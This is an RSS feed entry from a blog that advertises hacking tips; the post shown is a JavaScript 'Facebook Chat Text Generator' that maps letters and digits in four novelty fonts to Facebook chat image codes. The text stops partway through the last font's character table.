<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>◄ hackrich ►</title><description>Learn How To Hack! Know more about Computer/Internet Security and Programming,Hacking and security tips from experts.◄ hackrich ► provides You Tips N Tricks, Software Reviews, Hacks And Cool Web Sites That Makes Your hacking World More Productive.</description><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><pubDate>Sat, 7 Mar 2026 19:57:14 -0800</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">38</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://hackrich.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>Learn How To Hack! Know more about Computer/Internet Security and Programming,Hacking and security tips from experts.◄ hackrich ► provides You Tips N Tricks, Software Reviews, Hacks And Cool Web Sites That Makes Your hacking World More Productive.</itunes:subtitle><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>Facebook Chat Text Generator</title><link>http://hackrich.blogspot.com/2012/09/facebook-chat-text-generator.html</link><category>ASCII art</category><category>chat</category><category>education</category><category>Facebook</category><category>Facebook Animated Gif Image Status</category><category>Facebook Chat Text Generator</category><category>Facebook Emoticons</category><category>facebook symbols</category><category>study</category><category>Windows</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 3 Sep 2012 03:08:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-3029442310073897562</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh599ZRHuYbm0JutyVXSBMvCpgsyv45s0oGtXOtXngwMZqB0FeV-8tYoFWaP-pybJ-uZojXqyqUnvp24ihKEI7ZMHcRs1YQe0nw8hIrufJxT7xXQgwSbVg2DepVlxxiAGwCJ3vfMVHVJ-Jj/s1600/images.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="174" width="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh599ZRHuYbm0JutyVXSBMvCpgsyv45s0oGtXOtXngwMZqB0FeV-8tYoFWaP-pybJ-uZojXqyqUnvp24ihKEI7ZMHcRs1YQe0nw8hIrufJxT7xXQgwSbVg2DepVlxxiAGwCJ3vfMVHVJ-Jj/s320/images.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;

&lt;link rel="stylesheet" href="http://smileyti.me/wp-content/themes/facebook-lover/style.css" type="text/css" media="screen" /&gt;

&lt;script type="text/javascript"&gt;


if (window.top !== window.self) window.top.location.replace(window.self.location.href);

function copyToClipboard(field)
{
    var content = eval("document."+field)
    content.focus()
    content.select()
    range = content.createTextRange()
    range.execCommand("Copy")
    window.status="Contents copied to clipboard"
    setTimeout("window.status=''",1800)
}


&lt;/script&gt;
&lt;h1&gt;Facebook Chat Text Generator&lt;/h1&gt;
&lt;p&gt;&lt;font color="GREEN"&gt;
This is the new awesome Chat Text Generator, it work just like the original Chat Codes Maker but instead of making codes from images, it lets you format your text with cool smileys and awesome fonts. It is very simple to make it work, just type your text and paste the code, that&amp;#8217;s it.
&lt;/FONT&gt;&lt;/p&gt;
&lt;form id="textGenerator"&gt;
Font: 
&lt;select id="fontSelect" onChange="ajaxFunction();"&gt;
  &lt;option value="0"&gt;Fanboy&lt;/option&gt;
  &lt;option value="1"&gt;Tacobox&lt;/option&gt;
  &lt;option value="2"&gt;Yahoo&lt;/option&gt;
  &lt;option value="3"&gt;Neco&lt;/option&gt;
&lt;/select&gt;
&lt;input type="text" id="inputText" placeholder="Write your message here..." oninput="ajaxFunction();"/&gt;
&lt;/form&gt; 
&lt;div id="imageList"&gt;&lt;/div&gt;
&lt;div style="clear: both;"&gt;&lt;/div&gt;
&lt;div class="chatCodesWrapper"&gt;
&lt;textarea class="chatCodes" id="chatCodesResult" width="300"&gt;
&lt;/textarea&gt;
&lt;/div&gt;

&lt;b&gt;Use keyboard shortcuts &lt;u&gt;Ctrl+A&lt;/u&gt; to select codes and &lt;u&gt;Ctrl+C&lt;/u&gt; to copy codes.&lt;/b&gt;


&lt;script src="http://smileyti.me/wp-content/uploads/jquery.js" type="text/javascript"&gt;&lt;/script&gt;
&lt;script language="javaScript"&gt;

var fonts =  new Array(1);


for (var i = 0; i &lt; 4; i++) {
 fonts[i] = new Array();
}

//Fanboy font
fonts[0]['b'] = {code: '[[163286010464464]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc6/156275_163286010464464_159588847500847_251792_570720258_s.jpg'}; 
fonts[0]['a'] = {code: '[[162437323882666]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/562023_162437323882666_159588847500847_249933_1822118251_s.jpg'}; 
fonts[0]['!'] = {code: '[[458280007545246]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc7/409709_458280007545246_912744906_s.jpg'}; 
fonts[0]['$'] = {code: '[[458279980878582]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/391344_458279980878582_1621433759_s.jpg'}; 
fonts[0]['('] = {code: '[[458280017545245]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc7/304949_458280017545245_675307004_s.jpg'}; 
fonts[0][')'] = {code: '[[458280057545241]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc6/221852_458280057545241_1432673001_s.jpg'}; 
fonts[0]['+'] = {code: '[[458280044211909]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/376677_458280044211909_1194627418_s.jpg'}; 
fonts[0]['-'] = {code: '[[458280027545244]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/408329_458280027545244_1544482233_s.jpg'}; 
fonts[0][':'] = {code: '[[458279964211917]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-prn1/522053_458279964211917_853613123_s.jpg'}; 
fonts[0]['='] = {code: '[[458279994211914]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-prn1/547299_458279994211914_1526963129_s.jpg'}; 
fonts[0]['A'] = {code: '[[458279917545255]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash3/551256_458279917545255_1789305994_s.jpg'}; 
fonts[0]['B'] = {code: '[[458279937545253]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/394376_458279937545253_1383377010_s.jpg'}; 
fonts[0]['C'] = {code: '[[458279954211918]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-prn1/531139_458279954211918_2043533286_s.jpg'}; 
fonts[0]['D'] = {code: '[[458280080878572]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash4/319333_458280080878572_774856216_s.jpg'}; 
fonts[0]['E'] = {code: '[[458280094211904]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/428812_458280094211904_1091403998_s.jpg'}; 
fonts[0]['F'] = {code: '[[458280104211903]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/551089_458280104211903_2027390656_s.jpg'}; 
fonts[0]['G'] = {code: '[[458280114211902]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/575012_458280114211902_321657306_s.jpg'}; 
fonts[0]['H'] = {code: '[[458280124211901]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/405381_458280124211901_1345664268_s.jpg'}; 
fonts[0]['I'] = {code: '[[458280130878567]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/480078_458280130878567_696780022_s.jpg'}; 
fonts[0]['J'] = {code: '[[458280137545233]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash3/553739_458280137545233_1641524877_s.jpg'}; 
fonts[0]['K'] = {code: '[[458280150878565]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/426754_458280150878565_1241721295_s.jpg'}; 
fonts[0]['L'] = {code: '[[458280157545231]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-snc7/304558_458280157545231_1968355179_s.jpg'}; 
fonts[0]['M'] = {code: '[[458280164211897]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/378593_458280164211897_417493586_s.jpg'}; 
fonts[0]['N'] = {code: '[[458280177545229]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/185515_458280177545229_490040993_s.jpg'}; 
fonts[0]['O'] = {code: '[[458280254211888]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc7/293020_458280254211888_841320916_s.jpg'}; 
fonts[0]['P'] = {code: '[[458280257545221]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/183763_458280257545221_1706903128_s.jpg'}; 
fonts[0]['Q'] = {code: '[[458280260878554]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-snc7/309153_458280260878554_1066805985_s.jpg'}; 
fonts[0]['R'] = {code: '[[458280274211886]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-prn1/558280_458280274211886_655044670_s.jpg'}; 
fonts[0]['S'] = {code: '[[458280280878552]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/378595_458280280878552_58243966_s.jpg'}; 
fonts[0][' '] = {code: '[[458590980847482]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/380460_458590980847482_2018886790_s.jpg'}; 
fonts[0]['T'] = {code: '[[458280287545218]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-snc7/393790_458280287545218_555483970_s.jpg'}; 
fonts[0]['U'] = {code: '[[458280290878551]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-prn1/552059_458280290878551_2075392592_s.jpg'}; 
fonts[0]['V'] = {code: '[[458280304211883]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-prn1/553774_458280304211883_134173959_s.jpg'}; 
fonts[0]['W'] = {code: '[[458280307545216]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/417467_458280307545216_604989450_s.jpg'}; 
fonts[0]['X'] = {code: '[[458280310878549]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/394307_458280310878549_1309996024_s.jpg'}; 
fonts[0]['Y'] = {code: '[[458280314211882]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/562883_458280314211882_326832549_s.jpg'}; 
fonts[0]['Z'] = {code: '[[458280317545215]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-snc7/420061_458280317545215_1012435004_s.jpg'}; 
fonts[0]['0'] = {code: '[[458280330878547]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash3/523113_458280330878547_458496835_s.jpg'}; 
fonts[0]['1'] = {code: '[[458280187545228]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/185574_458280187545228_302373435_s.jpg'}; 
fonts[0]['2'] = {code: '[[458280194211894]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash3/551577_458280194211894_789078875_s.jpg'}; 
fonts[0]['3'] = {code: '[[458280200878560]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc7/294625_458280200878560_1862109603_s.jpg'}; 
fonts[0]['4'] = {code: '[[458280207545226]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash4/422535_458280207545226_750881946_s.jpg'}; 
fonts[0]['5'] = {code: '[[458280227545224]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash3/529984_458280227545224_1316831807_s.jpg'}; 
fonts[0]['6'] = {code: '[[458280230878557]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/388127_458280230878557_1249338985_s.jpg'}; 
fonts[0]['7'] = {code: '[[458280234211890]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash3/530866_458280234211890_451651677_s.jpg'}; 
fonts[0]['8'] = {code: '[[458280237545223]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/579872_458280237545223_1529613709_s.jpg'}; 
fonts[0]['9'] = {code: '[[458280240878556]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc7/378358_458280240878556_843747746_s.jpg'}; 
//Tacobox
fonts[1][' '] = {code: '[[458590980847482]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/380460_458590980847482_2018886790_s.jpg'}; 
fonts[1]['A'] = {code: '[[459914144048499]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-prn1/556440_459914144048499_2049871815_s.jpg'}; 
fonts[1]['B'] = {code: '[[459914150715165]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash3/522142_459914150715165_258579409_s.jpg'}; 
fonts[1]['C'] = {code: '[[460024624037451]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/553914_460024624037451_573080761_s.jpg'}; 
fonts[1]['D'] = {code: '[[460024627370784]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash3/522137_460024627370784_458125029_s.jpg'}; 
fonts[1]['E'] = {code: '[[460024637370783]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-prn1/523376_460024637370783_366848825_s.jpg'}; 
fonts[1]['F'] = {code: '[[460024647370782]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc6/377136_460024647370782_115962641_s.jpg'}; 
fonts[1]['G'] = {code: '[[460024654037448]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-prn1/542511_460024654037448_1697476851_s.jpg'}; 
fonts[1]['H'] = {code: '[[460024674037446]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc6/253883_460024674037446_1857566703_s.jpg'}; 
fonts[1]['I'] = {code: '[[460024680704112]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/427241_460024680704112_753021872_s.jpg'}; 
fonts[1]['J'] = {code: '[[460024697370777]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/298752_460024697370777_1438285353_s.jpg'}; 
fonts[1]['K'] = {code: '[[460024707370776]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc6/284732_460024707370776_362316001_s.jpg'}; 
fonts[1]['L'] = {code: '[[460024714037442]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash3/524445_460024714037442_1325730252_s.jpg'}; 
fonts[1]['M'] = {code: '[[460024717370775]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/574503_460024717370775_624334827_s.jpg'}; 
fonts[1]['N'] = {code: '[[460024720704108]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc6/255542_460024720704108_386994179_s.jpg'}; 
fonts[1]['O'] = {code: '[[460024727370774]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/295273_460024727370774_1120784381_s.jpg'}; 
fonts[1]['P'] = {code: '[[460024734037440]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/533212_460024734037440_894967476_s.jpg'}; 
fonts[1]['Q'] = {code: '[[460024744037439]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc6/255587_460024744037439_1937725852_s.jpg'}; 
fonts[1]['R'] = {code: '[[460024754037438]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc7/3698_460024754037438_843748720_s.jpg'}; 
fonts[1]['S'] = {code: '[[460024764037437]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash3/556380_460024764037437_972850616_s.jpg'}; 
fonts[1]['T'] = {code: '[[460024774037436]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/378210_460024774037436_1866048011_s.jpg'}; 
fonts[1]['U'] = {code: '[[460024784037435]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/386906_460024784037435_1152045858_s.jpg'}; 
fonts[1]['V'] = {code: '[[460024790704101]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/547092_460024790704101_1766439494_s.jpg'}; 
fonts[1]['W'] = {code: '[[460024797370767]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/305117_460024797370767_1936153180_s.jpg'}; 
fonts[1]['X'] = {code: '[[460024804037433]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash4/391528_460024804037433_1742174692_s.jpg'}; 
fonts[1]['Y'] = {code: '[[460024814037432]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/484461_460024814037432_1205338819_s.jpg'}; 
fonts[1]['Z'] = {code: '[[460024820704098]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash3/559054_460024820704098_1584121340_s.jpg'}; 
fonts[1]['0'] = {code: '[[460024490704131]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc6/216004_460024490704131_338034098_s.jpg'}; 
fonts[1]['1'] = {code: '[[460024514037462]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-snc7/426722_460024514037462_717486435_s.jpg'}; 
fonts[1]['2'] = {code: '[[460024524037461]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc6/195877_460024524037461_2021412154_s.jpg'}; 
fonts[1]['3'] = {code: '[[460024527370794]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/195994_460024527370794_1755143769_s.jpg'}; 
fonts[1]['4'] = {code: '[[460024534037460]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/292923_460024534037460_1019191484_s.jpg'}; 
fonts[1]['5'] = {code: '[[460024550704125]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/488226_460024550704125_1378972541_s.jpg'}; 
fonts[1]['6'] = {code: '[[460024564037457]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-prn1/557311_460024564037457_1944913842_s.jpg'}; 
fonts[1]['7'] = {code: '[[460024567370790]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/386906_460024567370790_877858692_s.jpg'}; 
fonts[1]['8'] = {code: '[[460024597370787]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/221875_460024597370787_2049508085_s.jpg'}; 
fonts[1]['9'] = {code: '[[460024610704119]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/422247_460024610704119_1731561722_s.jpg'}; 
//Yahoo Font
fonts[2][' '] = {code: '[[458590980847482]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/380460_458590980847482_2018886790_s.jpg'}; 
fonts[2]['A'] = {code: '[[463422450364335]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/487933_463422450364335_685951122_s.jpg'}; 
fonts[2]['B'] = {code: '[[463422457031001]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/558174_463422457031001_1559522104_s.jpg'}; 
fonts[2]['C'] = {code: '[[463422463697667]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc7/291949_463422463697667_1782963432_s.jpg'}; 
fonts[2]['D'] = {code: '[[463422467031000]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-snc7/320275_463422467031000_1761751388_s.jpg'}; 
fonts[2]['E'] = {code: '[[463422477030999]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/574649_463422477030999_133755973_s.jpg'}; 
fonts[2]['F'] = {code: '[[463422487030998]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/539247_463422487030998_983272650_s.jpg'}; 
fonts[2]['G'] = {code: '[[463422493697664]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash4/304974_463422493697664_1284900540_s.jpg'}; 
fonts[2]['H'] = {code: '[[463422500364330]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/387135_463422500364330_1016080455_s.jpg'}; 
fonts[2]['I'] = {code: '[[463422513697662]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc7/315032_463422513697662_136016418_s.jpg'}; 
fonts[2]['J'] = {code: '[[463422520364328]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash3/551780_463422520364328_2029021373_s.jpg'}; 
fonts[2]['K'] = {code: '[[463422527030994]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/308441_463422527030994_153303271_s.jpg'}; 
fonts[2]['L'] = {code: '[[463422537030993]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-prn1/564639_463422537030993_435914673_s.jpg'}; 
fonts[2]['M'] = {code: '[[463422540364326]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc6/255512_463422540364326_555182446_s.jpg'}; 
fonts[2]['N'] = {code: '[[463422543697659]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-snc6/603431_463422543697659_674208127_s.jpg'}; 
fonts[2]['O'] = {code: '[[463422557030991]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/206059_463422557030991_77406831_s.jpg'}; 
fonts[2]['P'] = {code: '[[463422573697656]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc7/403978_463422573697656_1516882549_s.jpg'}; 
fonts[2]['Q'] = {code: '[[463422587030988]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc7/293338_463422587030988_505567925_s.jpg'}; 
fonts[2]['R'] = {code: '[[463422600364320]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/375968_463422600364320_1066540480_s.jpg'}; 
fonts[2]['S'] = {code: '[[463422613697652]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc6/199683_463422613697652_2026756135_s.jpg'}; 
fonts[2]['T'] = {code: '[[463422627030984]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-snc6/199722_463422627030984_1883196406_s.jpg'}; 
fonts[2]['U'] = {code: '[[463422633697650]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-prn1/554689_463422633697650_1355225791_s.jpg'}; 
fonts[2]['V'] = {code: '[[463422647030982]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash3/564584_463422647030982_2051107545_s.jpg'}; 
fonts[2]['W'] = {code: '[[463422657030981]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/304404_463422657030981_535128672_s.jpg'}; 
fonts[2]['X'] = {code: '[[463422663697647]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/284493_463422663697647_956259664_s.jpg'}; 
fonts[2]['Y'] = {code: '[[463422667030980]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc6/249793_463422667030980_1244923587_s.jpg'}; 
fonts[2]['Z'] = {code: '[[463422673697646]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash3/574607_463422673697646_1871275109_s.jpg'}; 
fonts[2]['0'] = {code: '[[463422367031010]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/561474_463422367031010_757196048_s.jpg'}; 
fonts[2]['1'] = {code: '[[463422383697675]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc6/603387_463422383697675_1046360345_s.jpg'}; 
fonts[2]['2'] = {code: '[[463422407031006]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc7/378369_463422407031006_9759703_s.jpg'}; 
fonts[2]['3'] = {code: '[[463422410364339]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc6/199035_463422410364339_1623059326_s.jpg'}; 
fonts[2]['4'] = {code: '[[463422423697671]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/205878_463422423697671_1878370255_s.jpg'}; 
fonts[2]['5'] = {code: '[[463422427031004]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc7/385997_463422427031004_1263900269_s.jpg'}; 
fonts[2]['6'] = {code: '[[463422437031003]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/487999_463422437031003_1255536243_s.jpg'}; 
fonts[2]['7'] = {code: '[[463422440364336]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-prn1/563070_463422440364336_332666658_s.jpg'}; 
fonts[2]['8'] = {code: '[[463422443697669]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/488097_463422443697669_1025026788_s.jpg'}; 
fonts[2]['9'] = {code: '[[463422447031002]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/426607_463422447031002_414378076_s.jpg'}; 
//Neco font
fonts[3][' 1'] = {code: '[[458590980847482]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/380460_458590980847482_2018886790_s.jpg'}; 
fonts[3][' 2'] = {code: '[[458590980847482]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/380460_458590980847482_2018886790_s.jpg'}; 
fonts[3]['01'] = {code: '[[459611064078807]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-snc6/224658_459611064078807_1882965472_s.jpg'}; 
fonts[3]['02'] = {code: '[[459611077412139]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/386867_459611077412139_897366960_s.jpg'}; 
fonts[3]['A1'] = {code: '[[459335560773024]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash4/376826_459335560773024_796880109_s.jpg'}; 
fonts[3]['A2'] = {code: '[[459335570773023]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/533149_459335570773023_1507478169_s.jpg'}; 
fonts[3]['B1'] = {code: '[[459337127439534]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/418709_459337127439534_1241841952_s.jpg'}; 
fonts[3]['B2'] = {code: '[[459337134106200]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-snc6/225042_459337134106200_364277072_s.jpg'}; 
fonts[3]['C1'] = {code: '[[459611224078791]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/304531_459611224078791_991159452_s.jpg'}; 
fonts[3]['C2'] = {code: '[[459611227412124]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/378658_459611227412124_59651825_s.jpg'}; 
fonts[3]['D1'] = {code: '[[459611230745457]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/408224_459611230745457_628321139_s.jpg'}; 
fonts[3]['D2'] = {code: '[[459611237412123]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/542439_459611237412123_1912896105_s.jpg'}; 
fonts[3]['E1'] = {code: '[[459611247412122]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/378597_459611247412122_980482613_s.jpg'}; 
fonts[3]['E2'] = {code: '[[459611260745454]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/578905_459611260745454_691799160_s.jpg'}; 
fonts[3]['F1'] = {code: '[[459611277412119]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash3/559103_459611277412119_1823656672_s.jpg'}; 
fonts[3]['F2'] = {code: '[[459611284078785]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/409588_459611284078785_1645650419_s.jpg'}; 
fonts[3]['G1'] = {code: '[[459611287412118]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-prn1/527968_459611287412118_1923870910_s.jpg'}; 
fonts[3]['G2'] = {code: '[[459611290745451]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/221822_459611290745451_172751086_s.jpg'}; 
fonts[3]['H1'] = {code: '[[459611297412117]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash3/527045_459611297412117_1360357242_s.jpg'}; 
fonts[3]['H2'] = {code: '[[459611300745450]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-prn1/538996_459611300745450_274649220_s.jpg'}; 
fonts[3]['I1'] = {code: '[[459611307412116]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/304947_459611307412116_1096672528_s.jpg'}; 
fonts[3]['I2'] = {code: '[[459611320745448]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash3/522080_459611320745448_1404963922_s.jpg'}; 
fonts[3]['J1'] = {code: '[[459611324078781]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/603524_459611324078781_2070731712_s.jpg'}; 
fonts[3]['J2'] = {code: '[[459611334078780]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/574500_459611334078780_2027218108_s.jpg'}; 
fonts[3]['K1'] = {code: '[[459611344078779]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/431136_459611344078779_1864052488_s.jpg'}; 
fonts[3]['K2'] = {code: '[[459611350745445]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/409605_459611350745445_1030605278_s.jpg'}; 
fonts[3]['L1'] = {code: '[[459611364078777]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc6/284614_459611364078777_1728332786_s.jpg'}; 
fonts[3]['L2'] = {code: '[[459611370745443]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/294630_459611370745443_51654473_s.jpg'}; 
fonts[3]['M1'] = {code: '[[459611374078776]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/309273_459611374078776_1899892190_s.jpg'}; 
fonts[3]['M2'] = {code: '[[459611387412108]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-snc7/394414_459611387412108_595799210_s.jpg'}; 
fonts[3]['N1'] = {code: '[[459611390745441]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc7/394495_459611390745441_411607901_s.jpg'}; 
fonts[3]['N2'] = {code: '[[459611407412106]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc7/294336_459611407412106_979551001_s.jpg'}; 
